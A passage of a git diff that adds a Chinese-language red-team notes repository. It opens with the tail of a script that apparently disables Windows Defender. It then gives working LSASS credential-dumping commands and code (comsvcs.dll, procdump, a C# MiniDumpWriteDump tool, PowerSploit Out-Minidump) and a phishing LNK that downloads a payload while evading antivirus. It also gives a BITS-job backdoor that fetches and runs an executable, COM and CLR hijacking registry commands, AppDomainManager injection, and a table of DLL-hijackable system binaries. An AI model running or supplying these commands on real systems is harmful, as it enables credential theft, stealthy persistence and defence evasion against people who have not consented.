+'@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
+#-_-# hybrid script, can be pasted directly into powershell console
+```
+
+来源:[https://pastebin.com/raw/hLsCCZQY](https://pastebin.com/raw/hLsCCZQY)
+
diff --git a/dump/bsod.md b/dump/bsod.md
new file mode 100644
index 0000000..1b1822f
--- /dev/null
+++ b/dump/bsod.md
@@ -0,0 +1,6 @@
+# BSOD
+
+参考链接:
+
+{% embed url="https://www.mrwu.red/web/2000.html" caption="" %}
+
diff --git a/dump/comsvcs.dll.md b/dump/comsvcs.dll.md
new file mode 100644
index 0000000..3fcf24c
--- /dev/null
+++ b/dump/comsvcs.dll.md
@@ -0,0 +1,8 @@
+# comsvcs.dll
+
+powershell:
+
+```text
+.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\temp\lsass.dmp full
+```
+
diff --git a/dump/dumpert.md b/dump/dumpert.md
new file mode 100644
index 0000000..5546807
--- /dev/null
+++ b/dump/dumpert.md
@@ -0,0 +1,6 @@
+# Dumpert
+
+参考链接:
+
+{% embed url="https://github.com/outflanknl/Dumpert" caption="" %}
+
diff --git a/dump/hibernation.md b/dump/hibernation.md
new file mode 100644
index 0000000..22e63ed
--- /dev/null
+++ b/dump/hibernation.md
@@ -0,0 +1,6 @@
+# Hibernation
+
+参考链接:
+
+{% embed url="https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps" caption="" %}
+
diff --git a/dump/ppldump.md b/dump/ppldump.md
new file mode 100644
index 0000000..866d841
--- /dev/null
+++ b/dump/ppldump.md
@@ -0,0 +1,6 @@
+# PPLdump
+
+参考链接:
+
+{% embed url="https://github.com/itm4n/PPLdump" caption="" %}
+
diff --git a/dump/procdump.md b/dump/procdump.md
new file mode 100644
index 0000000..012ef88
--- /dev/null
+++ b/dump/procdump.md
@@ -0,0 +1,10 @@
+# procdump
+
+```text
+procdump -ma lsass.exe lsass.dmp
+```
+
+[http://live.sysinternals.com/procdump.exe](http://live.sysinternals.com/procdump.exe)
+
+[http://live.sysinternals.com/procdump64.exe](http://live.sysinternals.com/procdump64.exe)
+
diff --git a/dump/processdump.exe.md b/dump/processdump.exe.md
new file mode 100644
index 0000000..f7933e8
--- /dev/null
+++ b/dump/processdump.exe.md
@@ -0,0 +1,13 @@
+# ProcessDump.exe
+
+## 来自Cisco Jabber
+
+位于`c:\program files (x86)\cisco systems\cisco jabber\x64\`
+
+powershell:
+
+```text
+cd c:\program files (x86)\cisco systems\cisco jabber\x64\
+processdump.exe (ps lsass).id c:\temp\lsass.dmp
+```
+
diff --git a/dump/shellcode.md b/dump/shellcode.md
new file mode 100644
index 0000000..3c06176
--- /dev/null
+++ b/dump/shellcode.md
@@ -0,0 +1,6 @@
+# Shellcode
+
+参考链接:
+
+{% embed url="https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/" caption="" %}
+
diff --git a/dump/silentprocessexit.md b/dump/silentprocessexit.md
new file mode 100644
index 0000000..cd0325c
--- /dev/null
+++ b/dump/silentprocessexit.md
@@ -0,0 +1,6 @@
+# SilentProcessExit
+
+参考链接:
+
+{% embed url="https://github.com/deepinstinct/LsassSilentProcessExit" caption="" %}
+
diff --git a/dump/sqldumper.md b/dump/sqldumper.md
new file mode 100644
index 0000000..2052490
--- /dev/null
+++ b/dump/sqldumper.md
@@ -0,0 +1,17 @@
+# Sqldumper
+
+Microsoft SQL附带的调试实用程序。
+
+位置:
+
+* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+* C:\Program Files \(x86\)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
+
+参考链接:
+
+{% embed url="https://docs.microsoft.com/en-US/troubleshoot/sql/tools/use-sqldumper-generate-dump-file" caption="" %}
+
+{% embed url="https://twitter.com/countuponsec/status/910969424215232518" caption="" %}
+
+{% embed url="https://twitter.com/countuponsec/status/910977826853068800" caption="" %}
+
diff --git a/dump/task-manager-process-explorer.md b/dump/task-manager-process-explorer.md
new file mode 100644
index 0000000..653313f
--- /dev/null
+++ b/dump/task-manager-process-explorer.md
@@ -0,0 +1,6 @@
+# Task Manager/Process Explorer
+
+任务管理器中
+
+右键-创建转储文件
+
diff --git a/dump/untitled.md b/dump/untitled.md
new file mode 100644
index 0000000..c119131
--- /dev/null
+++ b/dump/untitled.md
@@ -0,0 +1,180 @@ +# MiniDumpWriteDump + +c\#: + +```csharp +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading; + +namespace MiniDumpWriteDump +{ + class Program + { + [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)] + static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle OutFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam); + + static void Main(string[] args) + { + try + { + Process[] process = Process.GetProcessesByName(args[0]); + Console.WriteLine("Get Processes Handle is " + process[0].Handle); + Console.WriteLine("Get Processes Id is " + process[0].Id); + using (FileStream fs = new FileStream("7kb.tmp", FileMode.Create, FileAccess.ReadWrite, FileShare.Write)) + { + Console.WriteLine("Dump Status:" + MiniDumpWriteDump(process[0].Handle, (uint)process[0].Id, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero)); + } + } + catch (Exception) + { + Console.WriteLine("MiniDumpWriteDump.exe lsass"); + } + } + } +} +``` + +ps1: + +```text +function Out-Minidump +{ +<# +.SYNOPSIS + + Generates a full-memory minidump of a process. + + PowerSploit Function: Out-Minidump + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None + +.DESCRIPTION + + Out-Minidump writes a process dump file with all process memory to disk. + This is similar to running procdump.exe with the '-ma' switch. + +.PARAMETER Process + + Specifies the process for which a dump will be generated. The process object + is obtained with Get-Process. + +.PARAMETER DumpFilePath + + Specifies the path where dump files will be written. By default, dump files + are written to the current working directory. 
Dump file names take following + form: processname_id.dmp + +.EXAMPLE + + Out-Minidump -Process (Get-Process -Id 4293) + + Description + ----------- + Generate a minidump for process ID 4293. + +.EXAMPLE + + Get-Process lsass | Out-Minidump + + Description + ----------- + Generate a minidump for the lsass process. Note: To dump lsass, you must be + running from an elevated prompt. + +.EXAMPLE + + Get-Process | Out-Minidump -DumpFilePath C:\temp + + Description + ----------- + Generate a minidump of all running processes and save them to C:\temp. + +.INPUTS + + System.Diagnostics.Process + + You can pipe a process object to Out-Minidump. + +.OUTPUTS + + System.IO.FileInfo + +.LINK + + http://www.exploit-monday.com/ +#> + + [CmdletBinding()] + Param ( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] + [System.Diagnostics.Process] + $Process, + + [Parameter(Position = 1)] + [ValidateScript({ Test-Path $_ })] + [String] + $DumpFilePath = $PWD + ) + + BEGIN + { + $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') + $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') + $Flags = [Reflection.BindingFlags] 'NonPublic, Static' + $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) + $MiniDumpWithFullMemory = [UInt32] 2 + } + + PROCESS + { + $ProcessId = $Process.Id + $ProcessName = $Process.Name + $ProcessHandle = $Process.Handle + $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" + + $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName + + $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) + + $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, + $ProcessId, + $FileStream.SafeFileHandle, + $MiniDumpWithFullMemory, + [IntPtr]::Zero, + [IntPtr]::Zero, + [IntPtr]::Zero)) + + $FileStream.Close() + + if (-not $Result) + { + $Exception = New-Object ComponentModel.Win32Exception + $ExceptionMessage = "$($Exception.Message) 
($($ProcessName):$($ProcessId))"
+
+ # Remove any partially written dump files. For example, a partial dump will be written
+ # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+ Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+ throw $ExceptionMessage
+ }
+ else
+ {
+ Get-ChildItem $ProcessDumpPath
+ }
+ }
+
+ END {}
+}
+```
+
+参考链接:
+
+{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1" caption="" %}
+
diff --git a/dump/winpmem.md b/dump/winpmem.md
new file mode 100644
index 0000000..8c79be7
--- /dev/null
+++ b/dump/winpmem.md
@@ -0,0 +1,6 @@
+# WinPmem
+
+参考链接:
+
+{% embed url="https://github.com/FSecureLABS/physmem2profit" caption="" %}
+
diff --git a/file/chm/README.md b/file/chm/README.md
new file mode 100644
index 0000000..8e3b868
--- /dev/null
+++ b/file/chm/README.md
@@ -0,0 +1,2 @@
+# CHM
+
diff --git a/file/chm/phishing-chm.md b/file/chm/phishing-chm.md
new file mode 100644
index 0000000..38b6c58
--- /dev/null
+++ b/file/chm/phishing-chm.md
@@ -0,0 +1,28 @@
+# 钓鱼chm
+
+```markup
+
+
+
+New Item
+
+
+
+
+
+
+
+
+```
+
+推荐使用WinCHM制作,msi文件自行打包制作,注意不能选择管理员权限
+
diff --git a/file/lnk/README.md b/file/lnk/README.md
new file mode 100644
index 0000000..31cf7f6
--- /dev/null
+++ b/file/lnk/README.md
@@ -0,0 +1,8 @@
+# LNK
+
+待整理
+
+参考文章:
+
+{% embed url="https://bbs.pediy.com/thread-260953.htm" caption="" %}
+
diff --git a/file/lnk/phishing-lnk.md b/file/lnk/phishing-lnk.md
new file mode 100644
index 0000000..fe5d811
--- /dev/null
+++ b/file/lnk/phishing-lnk.md
@@ -0,0 +1,19 @@
+# 钓鱼lnk
+
+```text
+$shell = New-Object -ComObject WScript.Shell;
+$desktop = [System.Environment]::GetFolderPath('Desktop');
+$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
+$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
+$shortcut.WindowStyle = 7;
+$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
+$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
+$shortcut.Save();
+```
+
+利用icon缓存来下载文件,并用conhost绕过杀软对进程链的判断。(仅适用于win10,win7等缓存目录不同,有兴趣可以自行编写)
+
+参考文章:
+
+{% embed url="https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/" caption="" %}
+
diff --git a/file/office.md b/file/office.md
new file mode 100644
index 0000000..d93e5e7
--- /dev/null
+++ b/file/office.md
@@ -0,0 +1,20 @@
+# Office
+
+待整理
+
+参考文章:
+
+{% embed url="https://www.anquanke.com/post/id/175548" caption="" %}
+
+{% embed url="https://docs.microsoft.com/zh-cn/deployoffice/compat/office-file-format-reference" caption="" %}
+
+{% embed url="https://docs.microsoft.com/zh-cn/previous-versions/office/gg615407%28v=office.14%29" caption="" %}
+
+{% embed url="https://github.com/dotnetcore/NPOI" caption="" %}
+
+{% embed url="https://github.com/xceedsoftware/DocX" caption="" %}
+
+{% embed url="https://github.com/Sicos1977/OfficeExtractor" caption="" %}
+
+{% embed url="https://github.com/EvotecIT/PSWriteWord" caption="" %}
+
diff --git a/file/pe.md b/file/pe.md
new file mode 100644
index 0000000..ab308e3
--- /dev/null
+++ b/file/pe.md
@@ -0,0 +1,8 @@
+# PE
+
+待整理
+
+参考文章:
+
+{% embed url="https://bbs.pediy.com/thread-121488.htm" caption="" %}
+
diff --git a/get-password/inject-mstsc.exe.md b/get-password/inject-mstsc.exe.md
new file mode 100644
index 0000000..8b05b5d
--- /dev/null
+++ b/get-password/inject-mstsc.exe.md
@@ -0,0 +1,6 @@
+# 注入mstsc.exe
+
+窃取远程桌面连接密码
+
+{% embed url="https://github.com/0x09AL/RdpThief" caption="" %}
+
diff --git a/get-password/mimikatz.md b/get-password/mimikatz.md
new file mode 100644
index 0000000..dda8813
--- /dev/null
+++ b/get-password/mimikatz.md
@@ -0,0 +1,6 @@
+# Mimikatz
+
+Mimikatz
+
+{% embed url="https://github.com/gentilkiwi/mimikatz/" caption="" %}
+
diff --git a/get-password/nplogonnotify.md b/get-password/nplogonnotify.md
new file mode 100644
index 0000000..5df1afd
--- /dev/null
+++ b/get-password/nplogonnotify.md
@@ -0,0 +1,6 @@
+# NPLogonNotify
+
+参考链接:
+
+{% embed url="https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" caption="" %}
+
diff --git a/get-password/smb.md b/get-password/smb.md
new file mode 100644
index 0000000..9ad02f8
--- /dev/null
+++ b/get-password/smb.md
@@ -0,0 +1,10 @@
+# SMB
+
+使用恶意主题来窃取密码
+
+{% embed url="https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/" caption="" %}
+
+利用恶意pdf文件来窃取密码
+
+{% embed url="https://research.checkpoint.com/2018/ntlm-credentials-theft-via-pdf-files/" caption="" %}
+
diff --git a/get-password/tickets.md b/get-password/tickets.md
new file mode 100644
index 0000000..df8312a
--- /dev/null
+++ b/get-password/tickets.md
@@ -0,0 +1,6 @@
+# Tickets
+
+Silver Tickets、Golden Tickets
+
+{% embed url="https://en.hackndo.com/kerberos-silver-golden-tickets/" caption="" %}
+
diff --git a/inject/inject.md b/inject/inject.md
new file mode 100644
index 0000000..873a011
--- /dev/null
+++ b/inject/inject.md
@@ -0,0 +1,8 @@
+# 注入
+
+## 原理:
+
+这篇文章讲的非常详细,重新整理一遍意义不大,直接看原文吧。
+
+{% embed url="https://www.elastic.co/cn/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" caption="" %}
+
diff --git a/lateral-movement/dcom.md b/lateral-movement/dcom.md
new file mode 100644
index 0000000..8a7653f
--- /dev/null
+++ b/lateral-movement/dcom.md
@@ -0,0 +1,2 @@
+# DCOM
+
diff --git a/lateral-movement/hash.md b/lateral-movement/hash.md
new file mode 100644
index 0000000..09b4fad
--- /dev/null
+++ b/lateral-movement/hash.md
@@ -0,0 +1,2 @@
+# HASH
+
diff --git a/lateral-movement/kerberos-tickets.md b/lateral-movement/kerberos-tickets.md
new file mode 100644
index 0000000..e6db80a
--- /dev/null
+++ b/lateral-movement/kerberos-tickets.md
@@ -0,0 +1,2 @@
+# Kerberos tickets
+
diff --git a/lateral-movement/rpc.md b/lateral-movement/rpc.md
new file mode 100644
index 0000000..912466b
--- /dev/null
+++ b/lateral-movement/rpc.md
@@ -0,0 +1,2 @@
+# RPC
+
diff --git a/lateral-movement/wmi.md b/lateral-movement/wmi.md
new file mode 100644
index 0000000..4e74a94
--- /dev/null
+++ b/lateral-movement/wmi.md
@@ -0,0 +1,2 @@
+# WMI
+
diff --git a/persistence/bits-jobs/README.md b/persistence/bits-jobs/README.md
new file mode 100644
index 0000000..9a27fee
--- /dev/null
+++ b/persistence/bits-jobs/README.md
@@ -0,0 +1,2 @@
+# BITS Jobs
+
diff --git a/persistence/bits-jobs/bits.md b/persistence/bits-jobs/bits.md
new file mode 100644
index 0000000..2ec3ad6
--- /dev/null
+++ b/persistence/bits-jobs/bits.md
@@ -0,0 +1,18 @@
+# BITS
+
+## BITS
+
+后台智能传输服务,它可以促进文件到Web服务器(HTTP)和共享文件夹(SMB)的传输能力。
+
+可以滥用此功能,以便在受感染的主机上下载有效负载(可执行文件,PowerShell脚本,Scriptlet等)并在给定时间执行这些文件
+
+## 新建BITS Jobs后门
+
+```text
+bitsadmin /create qwqdanchun
+bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe" "C:\Temp\qwqdanchun.exe"
+bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL
+bitsadmin /SetMinRetryDelay "qwqdanchun" 60
+bitsadmin /resume qwqdanchun
+```
+
diff --git a/persistence/com-hijack/README.md b/persistence/com-hijack/README.md
new file mode 100644
index 0000000..adc949a
--- /dev/null
+++ b/persistence/com-hijack/README.md
@@ -0,0 +1,2 @@
+# COM劫持
+
diff --git a/persistence/com-hijack/com-hijack.md b/persistence/com-hijack/com-hijack.md
new file mode 100644
index 0000000..61db1e7
--- /dev/null
+++ b/persistence/com-hijack/com-hijack.md
@@ -0,0 +1,100 @@
+# COM劫持
+
+## COM组件
+
+COM是Windows中的一个系统,用于在操作系统和软件组件之间进行交互,对各种COM对象的引用存储在注册表中。劫持COM对象需要在注册表中进行更改,以替换对合法系统组件的引用,这可能导致该组件在执行时不起作用。
+
+## 劫持CLR
+
+CLR全称Common Language Runtime,中文名称为公共语言运行时。
+
+CLR是.NET Framework的主要执行引擎,作用之一是监视程序的运行。
+
+在CLR之下运行的程序属于managed,不在CLR之下直接运行的程序属于native。
+
+此处主要以CLR的劫持作为实例,因为其本质也是COM劫持,但因为本身的特殊性经常被单独拿来说。
+
+```text
+#32bit
+wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
+wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
+SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
+REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
+REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
+#64bit
+wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
+wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
+SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
+REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
+REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
+SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
+REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
+REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
+```
+
+参考文章:
+
+{% embed url="https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" caption="" %}
+
+## 劫持其他COM组件
+
+操作的话,与CLR劫持相同,但是不再需要更改环境变量,少了一步敏感操作,具体使用自行取舍。
+
+示例命令行:
+
+```text
+SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32
+REG.EXE ADD %KEY% /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
+REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
+```
+
+原理类似,故只列出常用的几个CLSID。
+
+| CLSID |
+| :--- |
+| {42aedc87-2188-41fd-b9a3-0c966feabec1} |
+| {fbeb8a05-beee-4442-804e-409d6c4515e9} |
+| {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} |
+| {BCDE0395-E52F-467C-8E3D-C4579291692E} |
+| {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} |
+| {3543619C-D563-43f7-95EA-4DA7E1CC396A} |
+| {B056521A-9B10-425E-B616-1FCD828DB3B1} |
+| {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120} |
+| {93E5752E-B889-47C5-8545-654EE2533C64} |
+| {56FDF344-FD6D-11D0-958A-006097C9A090} |
+| {2163EB1F-3FD9-4212-A41F-81D1F933597F} |
+| {A6A2383F-AD50-4D52-8110-3508275E77F7} |
+| {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3} |
+| {88D96A05-F192-11D4-A65F-0040963251E5} |
+| {807583E5-5146-11D5-A672-00B0D022E945} |
+| {529A9E6B-6587-4F23-AB9E-9C7D683E3C50} |
+| {3CE74DE4-53D3-4D74-8B83-431B3828BA53} |
+| {A4B544A1-438D-4B41-9325-869523E2D6C7} |
+| {33C53A50-F456-4884-B049-85FD643ECFED} |
+| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
+| {275C23E2-3747-11D0-9FEA-00AA003F8646} |
+| {C15BB852-6F97-11D3-A990-00104B2A619F} |
+| {ED475410-B0D6-11D2-8C3B-00104B2A6676} |
+| {1299CF18-C4F5-4B6A-BB0F-2299F0398E27} |
+| {DCB00C01-570F-4A9B-8D69-199FDBA5723B} |
+| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
+| {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} |
+
+自行寻找的话只需要去看下面两个注册表位置即可
+
+```text
+HKCU\Software\Classes\CLSID\HKCU\Software\Classes\Wow6432Node\CLSID\
+```
+
+## 一些特殊技巧
+
+TreatAs(可以模拟其他类的CLSID。)
+
+{% embed url="https://docs.microsoft.com/en-us/windows/win32/com/treatas" caption="" %}
+
+利用零宽字节特性,在Process Explorer等分析软件中隐藏劫持dll
+
+{% embed url="https://en.wikipedia.org/wiki/Zero-width\_space" caption="" %}
+
+{% embed url="https://fatrodzianko.com/2020/03/08/dll-side-loading-and-zero-width-spaces/" caption="" %}
+
diff --git a/persistence/dll-hijack/README.md b/persistence/dll-hijack/README.md
new file mode 100644
index 0000000..2f4aa5f
--- /dev/null
+++ b/persistence/dll-hijack/README.md
@@ -0,0 +1,2 @@
+# DLL劫持
+
diff --git a/persistence/dll-hijack/hijack-.net-program.md b/persistence/dll-hijack/hijack-.net-program.md
new file mode 100644
index 0000000..d219aa5
--- /dev/null
+++ b/persistence/dll-hijack/hijack-.net-program.md
@@ -0,0 +1,57 @@
+# 劫持.NET程序
+
+## 劫持.NET程序(AppDomainManager)
+
+### 首先制作要加载的恶意程序
+
+C\#:
+
+```csharp
+using System;
+using System.Windows.Forms;
+public sealed class MyAppDomainManager : AppDomainManager
+{
+ public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
+ {
+ MessageBox.Show("AppDomainManager Injection");
+ return;
+ }
+}
+```
+
+之后将其编译为qwqdanchun.dll。
+
+### 注入方法一:
+
+命令行设置环境变量:
+
+```text
+set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
+```
+
+之后将qwqdanchun.dll与.net文件放在同一目录即可。
+
+### 注入方法二:
+
+寻找要注入的exe文件(此处示例使用qwqdanchun.exe),并将做好的dll与其置于同一目录,再将如下配置文件写入qwqdanchun.exe.config文件即可。
+
+```markup
+
+
+
+
+
+
+
+
+
+
+```
+
+参考文章:
+
+{% embed url="https://web.archive.org/web/20170919060201/http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html" caption="" %}
+
+{% embed url="https://pentestlaboratories.com/tag/appdomainmanager-injection/" caption="" %}
+
diff --git a/persistence/dll-hijack/hijack-autorun-programs.md b/persistence/dll-hijack/hijack-autorun-programs.md
new file mode 100644
index 0000000..438568d
--- /dev/null
+++ b/persistence/dll-hijack/hijack-autorun-programs.md
@@ -0,0 +1,1603 @@
+# 劫持自启动程序
+
+## **原理:**
+
+通过篡改、替换或代理原dll文件来达到劫持。
+
+## 方法:
+
+1.DLL替换:用恶意DLL替换合法的DLL。
+2.DLL搜索顺序劫持:在应用程序指定的不带路径的DLL中。根据搜索顺序,将恶意DLL放在实际DLL之前的搜索位置。大部分时候都是目标应用程序的工作目录。(微软文档:[https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order)](https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order%EF%BC%89)
+3.Phantom DLL劫持:丢弃一个恶意的DLL来代替合法应用程序尝试加载的丢失/不存在的DLL。
+4.DLL重定向:通过编辑,改变DLL被搜索的位置,例如%PATH%环境变量,或.exe.manifest/.exe.local文件。
+5.WinSxS DLL替换:用恶意DLL替换WinSxS文件夹中合法的DLL。
+6.相对路径DLL劫持:将合法的应用程序复制到用户可写文件夹中,并添加恶意DLL。
+
+## 实际使用:
+
+寻找开机自启的exe文件,并使用Process Explorer寻找是否有not found的dll文件,有的话直接放在对应位置(顺便提交拿一个CVE),没有就替换正常要加载的dll。建议做一个dll转发来保证程序正常运行。
+厚颜无耻的放一个自己的文章:
+
+{% embed url="https://bbs.pediy.com/thread-265287.htm" caption="" %}
+
+可以考虑搭配下面这个文章实现user权限的劫持
+
+{% embed url="https://secret.club/2020/07/01/diagtrack.html" caption="" %}
+
+## 附表
+
+此处列出“c:\windows\system32”中易受DLL Hijacking的所有可执行文件。每个可执行文件的旁边是一个或多个可以被劫持的DLL,以及被调用的DLL的函数,可以方便的进行利用。
+
+来源:
+
+{% embed url="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows" caption="" %}
+
+| Auto-elevated | Executable | DLL | Procedure |
+| :--- | :--- | :--- | :--- |
+| ✔️ | bthudtask.exe | DEVOBJ.dll | DllMain |
+| ✔️ | computerdefaults.exe | CRYPTBASE.DLL | DllMain |
+| ✔️ | computerdefaults.exe | edputil.dll | DllMain |
+| ✔️ | computerdefaults.exe | edputil.dll | EdpGetIsManaged |
+| ✔️ | computerdefaults.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
+| ✔️ | computerdefaults.exe | MLANG.dll | DllMain |
+| ✔️ | computerdefaults.exe | PROPSYS.dll | DllMain |
+| ✔️ | computerdefaults.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
+| ✔️ | computerdefaults.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD |
+| ✔️ | computerdefaults.exe | Secur32.dll | DllMain |
+| ✔️ | computerdefaults.exe | SSPICLI.DLL | DllMain |
+| ✔️ | computerdefaults.exe | SSPICLI.DLL | GetUserNameExW |
+| ✔️ | computerdefaults.exe | WININET.dll | DllMain |
+| ✔️ | computerdefaults.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
+| ✔️ | dccw.exe | ColorAdapterClient.dll | DllMain |
+| ✔️ | dccw.exe | dxva2.dll | DllMain |
+| ✔️ | dccw.exe | mscms.dll | DccwReleaseDisplayProfileAssociationList |
+| ✔️ | dccw.exe | mscms.dll | DllMain |
+| ✔️ | dccw.exe | mscms.dll | WcsGetCalibrationManagementState |
+| ✔️ | dccw.exe | mscms.dll | WcsSetCalibrationManagementState |
+| ✔️ | dccw.exe | USERENV.dll | DllMain |
+| ✔️ | easinvoker.exe | AUTHZ.dll | DllMain |
+| ✔️ | easinvoker.exe | netutils.dll | DllMain |
+| ✔️ | easinvoker.exe | samcli.dll | DllMain |
+| ✔️ | easinvoker.exe | SAMLIB.dll | DllMain |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | DllMain |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | FlushInProcTraceSession |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcLogger |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceFlushTrigger |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceSession |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcLogger |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcTraceSession |
+| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | StopInProcTraceSession |
+| ✔️ | easpolicymanagerbrokerhost.exe | policymanager.dll | DllMain |
+| ✔️ | fodhelper.exe | CRYPTBASE.DLL | DllMain |
+| ✔️ | fodhelper.exe | edputil.dll | DllMain |
+| ✔️ | fodhelper.exe | edputil.dll | EdpGetIsManaged |
+| ✔️ | fodhelper.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
+| ✔️ | fodhelper.exe | MLANG.dll | DllMain |
+| ✔️ | fodhelper.exe | PROPSYS.dll | DllMain |
+| ✔️ | fodhelper.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
+| ✔️ | fodhelper.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD |
+| ✔️ | fodhelper.exe | Secur32.dll | DllMain |
+| ✔️ | fodhelper.exe | SSPICLI.DLL | DllMain |
+| ✔️ | fodhelper.exe | SSPICLI.DLL | GetUserNameExW |
+| ✔️ | fodhelper.exe | WININET.dll | DllMain |
+| ✔️ | fodhelper.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
+| ✔️ | fsavailux.exe | DEVOBJ.dll | DllMain |
+| ✔️ | fxsunatd.exe | FXSAPI.dll | DllMain |
+| ✔️ | fxsunatd.exe | FXSAPI.dll | FaxConnectFaxServerW |
+| ✔️ | fxsunatd.exe | IPHLPAPI.DLL | DllMain |
+| ✔️ | fxsunatd.exe | PROPSYS.dll | DllMain |
+| ✔️ | immersivetpmvscmgrsvr.exe | DEVOBJ.dll | DllMain |
+| ✔️ | iscsicli.exe | DEVOBJ.dll | DllMain |
+| ✔️ | iscsicli.exe | ISCSIDSC.dll | DllMain |
+| ✔️ | iscsicli.exe | ISCSIDSC.dll | GetIScsiVersionInformation |
+| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpAllocMemory |
+| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpRegisterHeap |
